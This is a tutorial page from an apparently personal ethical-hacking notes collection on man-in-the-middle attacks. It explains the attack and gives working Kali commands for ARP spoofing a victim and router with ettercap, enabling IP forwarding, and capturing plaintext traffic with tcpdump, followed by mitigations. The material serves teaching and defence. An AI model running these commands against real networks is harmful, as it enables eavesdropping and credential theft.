Funmibi's Organization
  • NOTES
  • Ethical Hacking Lab Setup Guide
  • Information Gathering & Reconnaissance
  • Social Engineering Attack Report
  • Hash Cracking
  • ChatGPT for Cybersecurity
  • Google Hacking (Google Dorking)
  • Nmap Port Scanning & Vulnerability Assessment
  • Proof-of-Concept Exploit: EternalBlue (MS17-010)
  • Privilege Escalation & Client-Side Exploits
  • Buffer Overflow Vulnerability
  • Windows-Based Buffer Overflow Attack
  • Man-in-the-Middle (MITM) Attack
  • BeEF (Browser Exploitation Framework) Setup & Demonstration
Powered by GitBook
On this page
  • 1. What is a MITM Attack?
  • 2. How MITM Attacks Work
  • 3. MITM Attack Demonstration (Using ettercap on Kali Linux)
  • Step 1: Setup the Attack
  • Step 2: Enable IP Forwarding
  • Step 3: Identify Target IPs
  • Step 4: Launch ARP Spoofing
  • Step 5: Capture Data
  • 4. How to Mitigate MITM Attacks

Man-in-the-Middle (MITM) Attack

1. What is a MITM Attack?

A Man-in-the-Middle (MITM) attack is a type of cyberattack where an attacker intercepts and possibly alters communication between two parties without their knowledge. The attacker can:

  • Eavesdrop on sensitive data (e.g., login credentials, banking details).

  • Modify messages between parties.

  • Impersonate a legitimate user or server.

2. How MITM Attacks Work

MITM attacks typically occur in the following steps:

  1. Interception: The attacker places themselves between two communicating devices.

  2. Decryption (if applicable): If encryption is used, the attacker may attempt SSL stripping or exploit weak encryption.

  3. Data Manipulation: The attacker can modify traffic, inject malicious code, or redirect users to phishing websites.

  4. Data Exfiltration: Sensitive information is stolen and used for further exploitation.

3. MITM Attack Demonstration (Using ettercap on Kali Linux)

Step 1: Setup the Attack

Ensure you have ettercap installed on your attacker machine (Kali Linux).

```bash sudo apt update && sudo apt install ettercap-text-only ```

Step 2: Enable IP Forwarding

Allow your machine to forward packets between devices.

```bash echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward ```

Step 3: Identify Target IPs

Scan the network to identify potential targets. Use nmap:

```bash sudo nmap -sn 192.168.1.0/24 # Adjust subnet as needed ```

Step 4: Launch ARP Spoofing

Run the MITM attack using ettercap.

```bash sudo ettercap -T -M arp -i eth0 /192.168.1.100// /192.168.1.1// ```

  • 192.168.1.100: Victim's IP

  • 192.168.1.1: Router's IP

This tricks the victim into thinking the attacker's machine is the router.

Step 5: Capture Data

Use tcpdump or Wireshark to analyze the intercepted traffic:

```bash sudo tcpdump -i eth0 port 80 -A ```

4. How to Mitigate MITM Attacks

Use Strong Encryption: Always use HTTPS, SSH, VPNs to encrypt sensitive communication. Enable ARP Spoofing Detection: Tools like arpwatch detect spoofing attacks. Use Secure DNS: Configure DNSSEC to prevent rogue DNS attacks. Employ Network Segmentation: Separate critical network resources from user devices. Enforce Multi-Factor Authentication (MFA): Adds an extra layer of security even if credentials are compromised.

PreviousWindows-Based Buffer Overflow AttackNextBeEF (Browser Exploitation Framework) Setup & Demonstration